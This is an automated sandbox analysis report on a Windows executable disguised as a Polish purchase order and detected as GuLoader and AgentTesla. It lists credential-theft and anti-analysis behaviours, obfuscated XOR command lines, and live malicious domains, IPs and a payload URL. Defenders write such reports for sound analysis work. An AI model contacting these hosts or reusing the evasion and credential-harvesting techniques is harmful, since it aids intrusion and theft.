Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe

Overview

General Information

Sample Name:Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe
Analysis ID:791299
MD5:17388d36388d280c4e2d724c9ab58002
SHA1:ee660100dfbad59a2796244514bff64c66cd0ca7
SHA256:5f20a33e263b8b8f5388b8e2512d0678312257b8fdf592b8a83aa481076048ca
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected GuLoader
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Mass process execution to delay analysis
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
May check the online IP address of the machine
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Too many similar processes found
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Creates processes with suspicious names
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses FTP
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64native
  • Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe (PID: 4904 cmdline: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe MD5: 17388D36388D280C4E2D724C9AB58002)
    • cmd.exe (PID: 6448 cmdline: cmd.exe /c set /A "0x0E^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1420 cmdline: cmd.exe /c set /A "0x19^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1932 cmdline: cmd.exe /c set /A "0x05^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3356 cmdline: cmd.exe /c set /A "0x0E^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4748 cmdline: cmd.exe /c set /A "0x07^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2424 cmdline: cmd.exe /c set /A "0x78^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4428 cmdline: cmd.exe /c set /A "0x79^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5516 cmdline: cmd.exe /c set /A "0x71^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2568 cmdline: cmd.exe /c set /A "0x71^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1988 cmdline: cmd.exe /c set /A "0x08^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3324 cmdline: cmd.exe /c set /A "0x39^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 308 cmdline: cmd.exe /c set /A "0x2E^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 384 cmdline: cmd.exe /c set /A "0x2A^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1456 cmdline: cmd.exe /c set /A "0x3F^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1256 cmdline: cmd.exe /c set /A "0x2E^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7352 cmdline: cmd.exe /c set /A "0x0D^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5452 cmdline: cmd.exe /c set /A "0x22^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4124 cmdline: cmd.exe /c set /A "0x27^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1940 cmdline: cmd.exe /c set /A "0x2E^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1236 cmdline: cmd.exe /c set /A "0x0A^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 664 cmdline: cmd.exe /c set /A "0x63^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5128 cmdline: cmd.exe /c set /A "0x26^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6528 cmdline: cmd.exe /c set /A "0x6B^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6976 cmdline: cmd.exe /c set /A "0x39^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3280 cmdline: cmd.exe /c set /A "0x7F^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1292 cmdline: cmd.exe /c set /A "0x6B^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1384 cmdline: cmd.exe /c set /A "0x67^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6552 cmdline: cmd.exe /c set /A "0x6B^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2764 cmdline: cmd.exe /c set /A "0x22^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5424 cmdline: cmd.exe /c set /A "0x6B^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8 cmdline: cmd.exe /c set /A "0x7B^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1560 cmdline: cmd.exe /c set /A "0x33^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5016 cmdline: cmd.exe /c set /A "0x73^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5040 cmdline: cmd.exe /c set /A "0x7B^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4748 cmdline: cmd.exe /c set /A "0x7B^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1448 cmdline: cmd.exe /c set /A "0x7B^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1940 cmdline: cmd.exe /c set /A "0x7B^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7340 cmdline: cmd.exe /c set /A "0x7B^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2752 cmdline: cmd.exe /c set /A "0x7B^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4948 cmdline: cmd.exe /c set /A "0x7B^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7948 cmdline: cmd.exe /c set /A "0x67^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8000 cmdline: cmd.exe /c set /A "0x6B^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6620 cmdline: cmd.exe /c set /A "0x22^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7040 cmdline: cmd.exe /c set /A "0x6B^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2676 cmdline: cmd.exe /c set /A "0x7B^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6996 cmdline: cmd.exe /c set /A "0x67^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3360 cmdline: cmd.exe /c set /A "0x6B^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5060 cmdline: cmd.exe /c set /A "0x3B^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5040 cmdline: cmd.exe /c set /A "0x6B^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4748 cmdline: cmd.exe /c set /A "0x7B^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4284 cmdline: cmd.exe /c set /A "0x67^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3364 cmdline: cmd.exe /c set /A "0x6B^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7920 cmdline: cmd.exe /c set /A "0x22^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4880 cmdline: cmd.exe /c set /A "0x6B^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1456 cmdline: cmd.exe /c set /A "0x7F^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7352 cmdline: cmd.exe /c set /A "0x67^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7396 cmdline: cmd.exe /c set /A "0x6B^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1864 cmdline: cmd.exe /c set /A "0x22^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5452 cmdline: cmd.exe /c set /A "0x6B^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4192 cmdline: cmd.exe /c set /A "0x7B^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3156 cmdline: cmd.exe /c set /A "0x33^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5828 cmdline: cmd.exe /c set /A "0x73^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7340 cmdline: cmd.exe /c set /A "0x7B^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1956 cmdline: cmd.exe /c set /A "0x67^75" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • CasPol.exe (PID: 5424 cmdline: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 4792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.14099095140.000000000071D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
    00000089.00000002.18044285630.000000003418B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000089.00000002.18044285630.000000003418B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000001.00000002.14100531174.00000000058D8000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe PID: 4904JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
            Click to see the 2 entries

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            Timestamp:192.168.11.201.1.1.162662532012811 01/25/23-10:05:53.440564
            SID:2012811
            Source Port:62662
            Destination Port:53
            Protocol:UDP
            Classtype:Potentially Bad Traffic

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeVirustotal: Detection: 32%Perma Link
            Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 103.83.194.19:443 -> 192.168.11.20:49854 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 64.185.227.155:443 -> 192.168.11.20:49855 version: TLS 1.2
            Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: f:\bluetooth8.0.1.57\sw\src\WIN8_Mainline\ExtArch\UI\Win7UI\Prism\Composite.UnityExtensions\obj\x64\Release\Microsoft.Practices.Composite.UnityExtensions.pdb source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe, 00000001.00000003.13038087262.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Practices.Composite.UnityExtensions.dll.1.dr
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeCode function: 1_2_00405FFD FindFirstFileA,FindClose,
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeCode function: 1_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeCode function: 1_2_00402688 FindFirstFileA,

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2012811 ET DNS Query to a .tk domain - Likely Hostile 192.168.11.20:62662 -> 1.1.1.1:53
            May check the online IP address of the machine
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Joe Sandbox ViewIP Address: 103.83.194.19 103.83.194.19
            Source: Joe Sandbox ViewIP Address: 64.185.227.155 64.185.227.155
            Source: Joe Sandbox ViewIP Address: 64.185.227.155 64.185.227.155
            Source: global trafficHTTP traffic detected: GET /dkVAJHULLLAJIKvMzyyDm233.pcx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: enlluec.tkCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: unknownFTP traffic detected: 192.185.87.146:21 -> 192.168.11.20:49856 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 03:06. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 03:06. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 03:06. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
            Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: CasPol.exe, 00000089.00000002.18044285630.000000003418B000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000089.00000003.14129347941.0000000036396000.00000004.00000020.00020000.00000000.sdmp, Cookies.137.drString found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
            Source: Cookies.137.drString found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)
            Source: application-x-executable.png.1.drString found in binary or memory: http://creativecommons.org/licenses/by-sa/4.0/
            Source: CasPol.exe, 00000089.00000003.14075709287.0000000003810000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000089.00000002.18026950300.0000000003823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: CasPol.exe, 00000089.00000002.18026950300.0000000003821000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000089.00000003.14075709287.0000000003810000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: CasPol.exe, 00000089.00000002.18044285630.00000000341E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.sentientshift.com
